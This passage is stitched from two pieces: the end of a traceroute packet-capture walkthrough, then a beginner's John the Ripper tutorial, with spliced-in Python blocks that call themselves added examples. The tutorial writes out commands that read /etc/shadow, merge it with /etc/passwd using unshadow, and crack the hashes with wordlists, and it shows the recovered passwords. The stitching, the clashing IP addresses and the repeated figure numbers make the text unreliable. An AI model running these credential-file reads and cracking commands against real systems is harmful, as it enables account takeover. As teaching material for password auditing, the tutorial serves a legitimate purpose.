It is similar to the above: the source sends a TCP SYN packet to the destination machine on port 80, receives an ICMP Time Exceeded error message from each router, and repeats the process until it receives a SYN/ACK from the destination.

[Image: 17.png?w=687&ssl=1]

Here we can observe the SYN/ACK packet from the destination (172.168.161.14) sent to the source (192.168.1.103) from port 80, after which the source sends an RST packet to the destination on port 80.

[Image: 18.png?w=687&ssl=1]

Finally, from the image below we observed the following:
  • The source sent a DNS query to the router for the DNS lookup of 172.161.217.14.
  • The router sent the response to the source with the DNS name del03s10-in-f14.1e100.net.

This entry gets recorded by traceroute in its list.

[Image: 19.png?w=687&ssl=1]
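The three behaviours observed in the captures above (the TTL/Time Exceeded loop from “Working of Traceroute”, the per-probe UDP port sequence from 33435 at hop #1 attempt #1 to 33464 at hop #10 attempt #3, and the TCP mode that shows only asterisks when the destination does not answer on port 80) can all be reproduced with a small model of the algorithm. The following Python script is an added example, not part of the original post and not a packet-sending tool: it simulates routers decrementing the TTL and answering with ICMP errors, and the destination answering according to probe type. The topology and addresses in it are constructed, and the assumption that the UDP port advances by one per probe starting at 33435 is taken from the port numbers quoted in the text.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


@dataclass
class Host:
    ip: str
    is_destination: bool = False
    open_tcp_ports: Set[int] = field(default_factory=set)
    silent: bool = False              # hop that never sends ICMP errors: shows up as '*'


@dataclass
class Probe:
    ttl: int
    mode: str                         # 'udp', 'icmp' or 'tcp'
    dst_port: int


def forward(path: List[Host], probe: Probe) -> Optional[Tuple[str, str]]:
    """Carry one probe along the path. Each router decrements the TTL; the router at which
    it reaches zero drops the probe and answers Time Exceeded. The destination answers
    according to the probe type. Returns (responder_ip, message) or None on silence."""
    ttl = probe.ttl
    for hop in path:
        ttl -= 1
        if ttl == 0 and not hop.is_destination:
            return None if hop.silent else (hop.ip, "ICMP Time Exceeded")
        if hop.is_destination:
            if probe.mode == "udp":
                # nothing listens on the high-numbered probe port
                return (hop.ip, "ICMP Destination Port Unreachable")
            if probe.mode == "icmp":
                return (hop.ip, "ICMP Echo Reply")
            if probe.dst_port in hop.open_tcp_ports:
                return (hop.ip, "TCP SYN/ACK")
            return None               # closed or filtered service: no reply at all
    return None


def probe_port(hop: int, attempt: int, nprobes: int = 3, base_port: int = 33435) -> int:
    """UDP destination port for a hop/attempt pair, assuming one new port per probe
    starting from the first port seen in the capture (assumption, see lead-in)."""
    return base_port + (hop - 1) * nprobes + (attempt - 1)


def traceroute(path: List[Host], mode: str = "udp", nprobes: int = 3, max_hops: int = 30,
               base_port: int = 33435, tcp_port: int = 80):
    """Emulate the traceroute loop. Returns [(ttl, [responder or '*', ...], reached)]."""
    hops = []
    for ttl in range(1, max_hops + 1):
        answers, reached = [], False
        for attempt in range(1, nprobes + 1):
            port = tcp_port if mode == "tcp" else probe_port(ttl, attempt, nprobes, base_port)
            reply = forward(path, Probe(ttl, mode, port))
            if reply is None:
                answers.append("*")
                continue
            ip, msg = reply
            answers.append(ip)
            if msg != "ICMP Time Exceeded":
                reached = True        # only the destination sends anything else
        hops.append((ttl, answers, reached))
        if reached:
            break                     # destination answered: stop raising the TTL
    return hops


if __name__ == "__main__":
    # Constructed topology: two routers in front of a DNS server that has no TCP/80 service.
    net = [Host("192.168.1.1"), Host("10.0.0.1"),
           Host("8.8.8.8", is_destination=True, open_tcp_ports={53})]
    for mode in ("udp", "icmp", "tcp"):
        for ttl, answers, reached in traceroute(net, mode, max_hops=5):
            print(f"{mode:4} ttl={ttl} {' '.join(answers)}{'  <- destination' if reached else ''}")
```

In UDP and ICMP mode the run stops at TTL 3 because the destination answers with Port Unreachable or Echo Reply; in TCP mode against port 80 the same destination stays silent, so every TTL beyond the routers prints asterisks up to max_hops, which is exactly the all-asterisk output the text reports for tcptraceroute against Google DNS, while port 53 would complete the trace.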



We know the importance of John the Ripper in penetration testing, as it is one of the most popular password-cracking tools. In this article, we introduce John the Ripper and its various uses for beginners.

What is John the Ripper?

John the Ripper is a free password-cracking software tool developed by [To see content please register here]. Originally developed for Unix operating systems, it was later ported to other platforms as well. It is one of the most popular password testing and breaking programs, as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats, including several crypt password hash types commonly found on Linux or Windows. It can also crack the passwords of compressed files like ZIP and of document files like PDF.


Where to get John the Ripper?

John the Ripper can be downloaded from Openwall’s website: [To see content please register here]

or from the official John the Ripper repo: [To see content please register here]



John the Ripper comes pre-installed in Kali Linux and can be run from the terminal as shown below:

[Image: 1.png?w=687&ssl=1]

John the Ripper works in 3 distinct modes to crack the passwords:

  1. Single Crack Mode
  2. Wordlist Crack Mode
  3. Incremental Mode

John the Ripper Single Crack Mode

In this mode John the Ripper makes use of the information available to it, in the form of the username and other details. It can be used to crack password files in the format:

Username:Password


For example, if the username is "Hacker", it would try passwords such as:

hacker

HACKER

hacker1

h-acker

hacker=

We can use John the Ripper in Single Crack Mode as follows.

Here we have a text file named crack.txt containing the username and the password hash, where the password is hashed with SHA1, so to crack this password we will use:

Syntax: john [mode/option] [password file]

john --single --format=raw-sha1 crack.txt


As you can see in the screenshot that we have successfully cracked the password.

Username: ignite

Password: IgNiTe

[Image: 2.png?w=687&ssl=1]

John the Ripper Wordlist Crack Mode

In this mode John the Ripper uses a wordlist, also called a dictionary, and compares the hashes of the words present in the dictionary with the password hash. We can use any wordlist we like. John also ships with a built-in password.lst which contains most of the common passwords.

Let’s see how John the Ripper cracks passwords in Wordlist Crack Mode:

Here we have a text file named crack.txt containing the username and the password hash, where the password is hashed with SHA1, so to crack this password we will use:

Syntax: john [wordlist] [options] [password file]

john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt


As you can see in the screenshot, John the Ripper has cracked our password, which turns out to be asdfasdf.

[Image: 3.png?w=687&ssl=1]
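To make concrete what the two modes above actually do, here is an added example (not code from the article or from John the Ripper itself): a toy version of single crack mode and wordlist mode against unsalted "raw-*" hashes in the user:hash form used in crack.txt. The candidate rules in single_mode_candidates are only the five manglings the article lists, and the sample hashes are constructed in the block from the article's own plaintexts; the same loop is what you would run to audit an exported hash list against a common-password list.

```python
import hashlib

# john --format names -> hashlib names (subset; raw-md4 left out as hashlib may lack md4)
RAW_FORMATS = {"raw-md5": "md5", "raw-sha1": "sha1", "raw-sha256": "sha256"}


def parse_hash_file(text):
    """'user:hash' lines as in the article's crack.txt -> {hash: user}."""
    targets = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.strip().split(":", 1)
            targets[digest.lower()] = user
    return targets


def single_mode_candidates(username):
    """The username manglings the article lists (a tiny subset of John's single-mode rules)."""
    u = username.lower()
    return [u, u.upper(), u + "1", u[:1] + "-" + u[1:], u + "="]


def crack_raw(text, fmt, wordlist=None):
    """Hash each candidate once and look it up against every target at the same time.
    That works only because raw hashes carry no salt. wordlist=None selects single mode."""
    if fmt not in RAW_FORMATS:
        raise ValueError(f"unsupported format {fmt}")
    algo, targets, cracked = RAW_FORMATS[fmt], parse_hash_file(text), {}
    if wordlist is None:  # single mode: candidates are derived from each username
        wordlist = [c for user in targets.values() for c in single_mode_candidates(user)]
    for word in wordlist:
        word = word.rstrip("\n")
        user = targets.get(hashlib.new(algo, word.encode()).hexdigest())
        if user is not None:
            cracked.setdefault(user, word)
    return cracked


# Constructed sample: the hashes are generated here from plaintexts taken from the article
PLAINTEXTS = {"pavan": "Hacker", "ignite": "asdfasdf", "hacker": "hacker1"}
SAMPLE_CRACK_TXT = "\n".join(
    f"{u}:{hashlib.sha1(p.encode()).hexdigest()}" for u, p in PLAINTEXTS.items())
SAMPLE_WORDLIST = ["password", "123", "asdfasdf", "Hacker"]  # stands in for password.lst

if __name__ == "__main__":
    print("single:  ", crack_raw(SAMPLE_CRACK_TXT, "raw-sha1"))
    print("wordlist:", crack_raw(SAMPLE_CRACK_TXT, "raw-sha1", SAMPLE_WORDLIST))
```

Single mode only recovers the account whose password was derived from its username, while the wordlist run recovers the two that appear in the list; passing the wrong --format cracks nothing, which is why the format must match the hash type.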

Cracking the User Credentials

We are going to demonstrate two ways in which we will crack the user credentials of a Linux user.

Before that we will have to understand what a shadow file is.

In the Linux operating system, the shadow password file is a system file in which the hashed user passwords are stored, so that they are not readable by people who try to break into the system. It is located at /etc/shadow.

First Method

Now, for the first method, we will crack the credentials of a particular user, "pavan".

To do this, first we will open the shadow file as shown in the image.

[Image: 4.png?w=687&ssl=1]

Then we will find the entry for the user pavan, copy it from here and paste it into a text file. Here we have the file named crack.txt.

[Image: 5.png?w=687&ssl=1]

Now we will use John the Ripper to crack it.

john crack.txt


As you can see in the image below, John the Ripper has successfully cracked the password for the user pavan.

[Image: 6.png?w=687&ssl=1]

Second Method

Now, for the second method, we will crack the credentials of all the users collectively.

To do this we will use the John the Ripper utility called "unshadow".

unshadow /etc/passwd /etc/shadow > crack.txt


[Image: 7.png?w=687&ssl=1]

Here the unshadow command combines the /etc/passwd and /etc/shadow files into a single file that John can work on. We use both files so that John has the account information from /etc/passwd alongside the hashes from /etc/shadow, which lets it crack the credentials of all users efficiently.

Here is how the crack file looks after the unshadow command.

[Image: 8.png?w=687&ssl=1]
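To show what unshadow actually produces, here is an added example (not the article's code and not John the Ripper's own implementation): a minimal re-implementation of the passwd/shadow merge, plus a check of which crypt(3) algorithm each account uses, which is the prefix John autodetects. The prefix-to-algorithm table is an assumption based on the standard crypt identifiers, and the sample passwd and shadow lines are constructed with placeholder hash bodies.

```python
# crypt(3) hash prefixes -> algorithm names (assumption: standard glibc/libxcrypt ids)
CRYPT_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                  "$y$": "yescrypt", "$2b$": "bcrypt"}


def unshadow(passwd_text, shadow_text):
    """Replace the 'x' password field of each passwd line with the hash from shadow.
    Accounts with no shadow entry keep their passwd field, as unshadow itself does."""
    shadow = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and not line.startswith("#"):
            shadow[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return "\n".join(merged)


def classify(hashed):
    """Name the crypt algorithm of a password field, or flag it as not crackable."""
    if hashed in ("", "*", "x") or hashed.startswith("!"):  # '!' prefix = account locked
        return "locked/no-hash"
    for prefix, name in CRYPT_PREFIXES.items():
        if hashed.startswith(prefix):
            return name
    return "unknown"


def audit(merged_text):
    """{user: algorithm} for every line of an unshadow-style file. md5crypt is the
    cheapest of these to attack, so a defender should migrate those accounts first."""
    rows = (line.split(":") for line in merged_text.splitlines())
    return {f[0]: classify(f[1]) for f in rows if len(f) > 1}


# Constructed sample input; the hash bodies are placeholders, not real digests
SAMPLE_PASSWD = "\n".join(["root:x:0:0:root:/root:/bin/bash",
                           "pavan:x:1001:1001::/home/pavan:/bin/bash",
                           "raj:x:1002:1002::/home/raj:/bin/bash",
                           "sync:x:4:65534:sync:/bin:/bin/sync"])
SAMPLE_SHADOW = "\n".join(["root:!:18000:0:99999:7:::",
                           "pavan:$6$saltsalt$PLACEHOLDERHASH:18000:0:99999:7:::",
                           "raj:$1$abcd$PLACEHOLDERMD5:18000:0:99999:7:::",
                           "sync:*:18000:0:99999:7:::"])

if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    print(merged)
    print(audit(merged))
```

Locked accounts (a "!" or "*" in the hash field) are carried through unchanged, so the audit shows at a glance which entries John can even attempt and which are still on the weak md5crypt scheme.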

Now we will use John to crack the credentials of all the users collectively.

john --wordlist=/usr/share/john/password.lst crack.txt


[Image: 9.png?w=687&ssl=1]

As you can see from the provided image, we have discovered the following credentials:

User     Password
Raj      123
Pavan    Asdfasdf
Ignite   Yellow

Stopping and Restoring Cracking

While John the Ripper is working on cracking some passwords we can interrupt or pause the cracking and restore or resume it again at our convenience.

So while John the Ripper is running you can interrupt the cracking by pressing "q" or Ctrl+C as shown in the given image.

[Image: 10.png?w=687&ssl=1]

Now to resume or restore the cracking process we will use the --restore option of John the Ripper as shown:

john --restore


[Image: 11.png?w=687&ssl=1]

Now we will crack various hash types using John the Ripper.

SHA1

To crack a SHA1 hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt


As you can see in the given image, we have the username pavan and the password Hacker.

[Image: 12.png?w=687&ssl=1]

MD5

To crack an MD5 hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt


As you can see in the given screenshot, we have the username pavan and the password P@ssword.

[Image: 13.png?w=687&ssl=1]

MD4

To crack an MD4 hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md4 crack.txt


As you can see in the given screenshot, we have the username pavan and the password Rockyou.

[Image: 14.png?w=687&ssl=1]

SHA256

To crack a SHA256 hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 crack.txt


As you can see in the given screenshot, we have the username pavan and the password pAsSwOrD.

RIPEMD128

To crack a RIPEMD128 hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=ripemd-128 crack.txt


As you can see in the given image, we have the username pavan and the password password123.

[Image: 15.png?w=687&ssl=1]

Whirlpool

To crack a Whirlpool hash we will use RockYou as the wordlist and crack the password as shown below:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=whirlpool crack.txt


As you can see in the given screenshot, we have the username pavan and the password password666.

[Image: 17.png?w=687&ssl=1]

View All Formats

John the Ripper supports many hash formats, some of which we showed above. To view all the formats it supports:

john --list=formats


We hope you can use this article as a reference while working with John the Ripper. More on John the Ripper will follow in the next part.

[Image: 18.png?w=687&ssl=1]